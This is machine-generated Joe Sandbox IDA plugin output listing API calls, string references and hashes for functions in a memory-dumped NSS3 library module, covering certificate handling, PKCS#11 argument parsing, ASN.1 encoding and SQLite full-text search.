memcmp.VCRUNTIME140(?,6C8996FC,00000048), ref: 6C77CFDC
CERT_GetCertTimes.NSS3(?,?,?), ref: 6C77CFF6
PR_GetCurrentThread.NSS3 ref: 6C77CDFD

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

PR_GetCurrentThread.NSS3 ref: 6C77CE52
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D4C4
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D4E2
PR_GetCurrentThread.NSS3 ref: 6C77D4EA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77D515
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C77D52C
PR_GetCurrentThread.NSS3 ref: 6C77D540
free.MOZGLUE(?), ref: 6C77D567
CERT_DestroyCertificate.NSS3(00000000), ref: 6C77D575
CERT_DestroyCertificate.NSS3(?), ref: 6C77D584
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77D592

Part of subcall function 6C7906A0: TlsGetValue.KERNEL32 ref: 6C7906C2
Part of subcall function 6C7906A0: EnterCriticalSection.KERNEL32(?), ref: 6C7906D6
Part of subcall function 6C7906A0: PR_Unlock.NSS3 ref: 6C7906EB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentErrorThread$CertificateDestroyUtil$Cert$Value$Alloc_Arena_Timesmemcmp$ArenaCheckConstrainedCriticalEnterEqual_FindFreeIssuerItemsNamesPublicSectionTrustUnlockValidfreerealloc
String ID:
API String ID: 3754541784-0
Opcode ID: c022c93512b52e700d2861c1fbf0950c91eedec4b15b1020bd51cbc309fcb669
Instruction ID: 3134d30c2b4352e298934bf1c568e122816381528e03305353a6e354f466f291
Opcode Fuzzy Hash: c022c93512b52e700d2861c1fbf0950c91eedec4b15b1020bd51cbc309fcb669
Instruction Fuzzy Hash: A3522771A083059BEF209F68CE40B5B77E1AF95318F14493CF85997B61E731E819CBA2

Function 6C7C09B0 Relevance: 66.8, APIs: 44, Instructions: 817memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C7C1AD3), ref: 6C7C09D5
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C7C1AD3), ref: 6C7C09E9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7C0A18
PR_SetError.NSS3(00000000,00000000), ref: 6C7C0A30
memcpy.VCRUNTIME140(?,00000000,00000020,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7C0CC9
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7C0D05
EnterCriticalSection.KERNEL32(?), ref: 6C7C0D19
PR_Unlock.NSS3(?), ref: 6C7C0D36
free.MOZGLUE(?), ref: 6C7C0D75
TlsGetValue.KERNEL32 ref: 6C7C0DA1
EnterCriticalSection.KERNEL32(?), ref: 6C7C0DB5
PR_Unlock.NSS3(?), ref: 6C7C0DEB
PORT_Alloc_Util.NSS3(?), ref: 6C7C0DFF
PR_Unlock.NSS3(?), ref: 6C7C0E37
free.MOZGLUE(?), ref: 6C7C0E4E
PR_SetError.NSS3(00000000,00000000), ref: 6C7C0E6A
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7C0E9A
TlsGetValue.KERNEL32 ref: 6C7C0F23
EnterCriticalSection.KERNEL32(?), ref: 6C7C0F37
PR_SetError.NSS3(00000000,00000000), ref: 6C7C0FC7

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_Unlock.NSS3(?), ref: 6C7C0FDE
TlsGetValue.KERNEL32 ref: 6C7C0FFA
EnterCriticalSection.KERNEL32(?), ref: 6C7C100E
PR_Unlock.NSS3(?), ref: 6C7C1050
PR_Unlock.NSS3(?), ref: 6C7C1073
TlsGetValue.KERNEL32 ref: 6C7C1087
EnterCriticalSection.KERNEL32(?), ref: 6C7C109B
PR_Unlock.NSS3(?), ref: 6C7C10B8
free.MOZGLUE(?), ref: 6C7C1113
PORT_Alloc_Util.NSS3(?), ref: 6C7C1151
free.MOZGLUE(?), ref: 6C7C11AB
TlsGetValue.KERNEL32 ref: 6C7C1296
EnterCriticalSection.KERNEL32(?), ref: 6C7C12AB
PR_Unlock.NSS3(?), ref: 6C7C12D9
TlsGetValue.KERNEL32 ref: 6C7C12F4
EnterCriticalSection.KERNEL32(?), ref: 6C7C130C
PR_Unlock.NSS3(?), ref: 6C7C1340
TlsGetValue.KERNEL32 ref: 6C7C1354
EnterCriticalSection.KERNEL32(?), ref: 6C7C136C
PR_Unlock.NSS3(?), ref: 6C7C13A3
TlsGetValue.KERNEL32 ref: 6C7C13BA
EnterCriticalSection.KERNEL32(?), ref: 6C7C13CF
PR_Unlock.NSS3(?), ref: 6C7C13FB

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7C141E

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalSection$Enter$Errorfree$Alloc_Utilcalloc$Leavememcpymemset
String ID:
API String ID: 3136013483-0
Opcode ID: 351d47ba6428f72a87eeb3d17da76757047d3db145fae4a605fca16945e98e18
Instruction ID: 22312df0a6488b42d50fd5f628a8e8756268ebde7362042e8d818b6feefc387e
Opcode Fuzzy Hash: 351d47ba6428f72a87eeb3d17da76757047d3db145fae4a605fca16945e98e18
Instruction Fuzzy Hash: 1F72C0B1E002569FEF219F24D9887997BB4BF05318F1801B9DC099BB42E734E995CBD2

Function 6C7D4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C7B601B,?,00000000,?), ref: 6C7D486F
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C7D48A8
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C7D48BE
NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C7D48DE
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C7D48F5
NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C7D490A
PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C7D4919
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C7D493F
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4970
PORT_Alloc_Util.NSS3(00000001), ref: 6C7D49A0
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C7D49AD
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D49D4
NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C7D49F4
NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C7D4A10
NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C7D4A27
NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C7D4A3D
NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C7D4A4F
PL_strcasecmp.NSS3(00000000,every), ref: 6C7D4A6C
PL_strcasecmp.NSS3(00000000,timeout), ref: 6C7D4A81
free.MOZGLUE(00000000), ref: 6C7D4AAB
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7D4ABE
PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C7D4ADC
free.MOZGLUE(00000000), ref: 6C7D4B17
NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C7D4B33

Part of subcall function 6C7D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D413D
Part of subcall function 6C7D4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7D4162
Part of subcall function 6C7D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D416B
Part of subcall function 6C7D4120: PL_strncasecmp.NSS3(2B}l,?,00000001), ref: 6C7D4187
Part of subcall function 6C7D4120: NSSUTIL_ArgSkipParameter.NSS3(2B}l), ref: 6C7D41A0
Part of subcall function 6C7D4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7D41B4
Part of subcall function 6C7D4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C7D41CC
Part of subcall function 6C7D4120: NSSUTIL_ArgFetchValue.NSS3(2B}l,?), ref: 6C7D4203

PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C7D4B53
free.MOZGLUE(00000000), ref: 6C7D4B94
free.MOZGLUE(?), ref: 6C7D4BA7
free.MOZGLUE(00000000), ref: 6C7D4BB7
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4BC8

Strings

every, xrefs: 6C7D4A66
hasRootTrust, xrefs: 6C7D4B4D
slotFlags, xrefs: 6C7D4A22
timeout, xrefs: 6C7D4A38, 6C7D4A7B
askpw, xrefs: 6C7D4A4A
hasRootCerts, xrefs: 6C7D4AD6
rootFlags, xrefs: 6C7D4AB9, 6C7D4B2E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
API String ID: 3791087267-1256704202
Opcode ID: b00498007338e25a47de58443ecbd422713a3717856eb5ca55ae8af414ffbfef
Instruction ID: faef1fce2bbc3525c292949181b57293d523d1efe63489ea1973cead367c3fb6
Opcode Fuzzy Hash: b00498007338e25a47de58443ecbd422713a3717856eb5ca55ae8af414ffbfef
Instruction Fuzzy Hash: F5C129B0E053555FEB108FA9DE447AE7BB4AF0624CF1A0438EC95A7B01E721F915D7A0

Function 6C796D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,6C89A8EC,0000006C), ref: 6C796DC6
memcpy.VCRUNTIME140(?,6C89A958,0000006C), ref: 6C796DDB
memcpy.VCRUNTIME140(?,6C89A9C4,00000078), ref: 6C796DF1
memcpy.VCRUNTIME140(?,6C89AA3C,0000006C), ref: 6C796E06
memcpy.VCRUNTIME140(?,6C89AAA8,00000060), ref: 6C796E1C
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C796E38

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PK11_DoesMechanism.NSS3(?,?), ref: 6C796E76
TlsGetValue.KERNEL32 ref: 6C79726F
EnterCriticalSection.KERNEL32(?), ref: 6C797283

Strings

!, xrefs: 6C797123

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
String ID: !
API String ID: 3333340300-2657877971
Opcode ID: ca3aa0358fa286691e40e11472568cb6709aa424e7f825af19ddd9c7f45c07c2
Instruction ID: 308542ffa5ec354283845bb2f09da9896fcdcabb97360432bc6dd666d18b238c
Opcode Fuzzy Hash: ca3aa0358fa286691e40e11472568cb6709aa424e7f825af19ddd9c7f45c07c2
Instruction Fuzzy Hash: 5F729E75D052199FDF60DF28DD88B9ABBB5BF49308F1041A9D80DA7701EB31AA84CF91

Function 6C7B8A30 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 393memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B8A58

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B8AC6
PORT_ArenaAlloc_Util.NSS3(00000000,00000044), ref: 6C7B8ADF
SECITEM_CopyItem_Util.NSS3(00000000,00000004,?), ref: 6C7B8B19
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C7B8B2D
PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6C7B8B49
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000010,00000000), ref: 6C7B8B61
SEC_ASN1EncodeInteger_Util.NSS3(00000000,0000001C), ref: 6C7B8B83
SECOID_SetAlgorithmID_Util.NSS3(00000000,-0000002C,?,00000000), ref: 6C7B8BA0
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B8BF0
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C7B8BF9
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B8C13
HASH_ResultLenByOidTag.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B8C3A
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7B8CA7
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B8CC4
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7B8D12
PORT_FreeArena_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B8D20
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B8D40
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B8D99
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7B8DBF
PORT_ArenaAlloc_Util.NSS3(00000123,00000018), ref: 6C7B8DD5
SEC_ASN1EncodeItem_Util.NSS3(?,?,00000000,6C89D864), ref: 6C7B8E39

Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7CF0C8
Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7CF122

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,?), ref: 6C7B8E5B

Part of subcall function 6C7CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C77E708,00000000,00000000,00000004,00000000), ref: 6C7CBE6A
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C7CBE7E
Part of subcall function 6C7CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C7CBEC2

SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C89D8C4), ref: 6C7B8E94
SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000000,?), ref: 6C7B8EAC
PORT_ZAlloc_Util.NSS3(00000018), ref: 6C7B8EBA
SECOID_CopyAlgorithmID_Util.NSS3(00000000,00000000,00000000), ref: 6C7B8ECC
SECITEM_ZfreeItem_Util.NSS3(-0000000C,00000000), ref: 6C7B8EE1
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C7B8EF4
free.MOZGLUE(00000000), ref: 6C7B8EFD
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7B8F11
PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C7B8F1C

Strings

tFVPj, xrefs: 6C7B8EC4

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_Item_$Free$AlgorithmAlloc_ArenaCopyEncodeFindTag_$ErrorZfree$Integer_$GenerateHashInitK11_LockPoolRandomResultTypecallocfree
String ID: tFVPj
API String ID: 2709086113-199373283
Opcode ID: 3e668ba14cfec795f83235f6a641ca81f33c4166a5c27dadb38594b5d46c086d
Instruction ID: 2628289f50d363e013aabc111be2c726b27a38f7d31878dcac59fd0f3cab4655
Opcode Fuzzy Hash: 3e668ba14cfec795f83235f6a641ca81f33c4166a5c27dadb38594b5d46c086d
Instruction Fuzzy Hash: ECD103B1A043029FE7109F24DE89BAB77E9EF55308F14493BEC54E6A81F730E558C692

Function 6C718460 Relevance: 43.1, APIs: 23, Strings: 1, Instructions: 1095COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,00000030), ref: 6C7184FF
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(377F0682), ref: 6C7188BB
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002DE218), ref: 6C7188CE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7188E2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFFFF), ref: 6C7188F6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71894F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71895F
sqlite3_randomness.NSS3(00000008,?), ref: 6C718914

Part of subcall function 6C7031C0: sqlite3_initialize.NSS3 ref: 6C7031D6

sqlite3_randomness.NSS3(00000004,?), ref: 6C718A13
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C718A65
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C718A6F
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C718B87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C718B94
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(002E5B33), ref: 6C718BAD

Strings

cannot limit WAL size: %s, xrefs: 6C719188

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$sqlite3_randomness$memcmpsqlite3_initialize
String ID: cannot limit WAL size: %s
API String ID: 2554290823-3503406041
Opcode ID: cb6eece3a62312dc592bafc52c72683b24232702fc6b592182c15369d00e7318
Instruction ID: 89f8d58d9b81f0dcdcd13cf548d263e75119c3a8e45f4ebb4a8ac2bbd9628b94
Opcode Fuzzy Hash: cb6eece3a62312dc592bafc52c72683b24232702fc6b592182c15369d00e7318
Instruction Fuzzy Hash: 38928F75A083019FD704CF29C980A5AB7F1FFC9318F198A2DE99987B52D731E945CB82

Function 6C7DAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C7DACC4
PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C7DACD5
memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C7DACF3
SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C7DAD3B
SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7DADC8
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DADDF
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DADF0

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7DB06A
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DB08C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DB1BA
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7DB27C
memset.VCRUNTIME140(?,00000000,00002010), ref: 6C7DB2CA
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7DB3C1
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DB40C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
String ID:
API String ID: 1285963562-0
Opcode ID: 6622f40e3f63b5954a03008dca1277074296384f8fa25b3a2f763ed3a8dd032c
Instruction ID: e27f82db3c0c3700629e5e64354221eabc0f9c98c2d9e67cd2aca0100eb8d7c2
Opcode Fuzzy Hash: 6622f40e3f63b5954a03008dca1277074296384f8fa25b3a2f763ed3a8dd032c
Instruction Fuzzy Hash: BE22DE71A04301AFE710CF14CE49B9A77E1AF84308F25893CE8595B792E732F859CB96

Function 6C75ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C75ED38

Part of subcall function 6C6F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F4FC4

sqlite3_mprintf.NSS3(snippet), ref: 6C75EF3C
sqlite3_mprintf.NSS3(offsets), ref: 6C75EFE4

Part of subcall function 6C81DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C6F5001,?,00000003,00000000), ref: 6C81DFD7

sqlite3_mprintf.NSS3(matchinfo), ref: 6C75F087
sqlite3_mprintf.NSS3(matchinfo), ref: 6C75F129
sqlite3_mprintf.NSS3(optimize), ref: 6C75F1D1
sqlite3_free.NSS3(?), ref: 6C75F368

Strings

unicode61, xrefs: 6C75EDB5
porter, xrefs: 6C75ED97
optimize, xrefs: 6C75F199, 6C75F1CC, 6C75F211
fts4aux, xrefs: 6C75ECF9
simple, xrefs: 6C75ED79
offsets, xrefs: 6C75EFAF, 6C75EFDF, 6C75F01F
fts3, xrefs: 6C75F247
matchinfo, xrefs: 6C75F04F, 6C75F082, 6C75F0C2, 6C75F0F2, 6C75F124, 6C75F169
fts3_tokenizer, xrefs: 6C75EE1A, 6C75EEA8
fts3tokenize, xrefs: 6C75F30F
fts4, xrefs: 6C75F2AD
snippet, xrefs: 6C75EF05, 6C75EF37, 6C75EF7C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
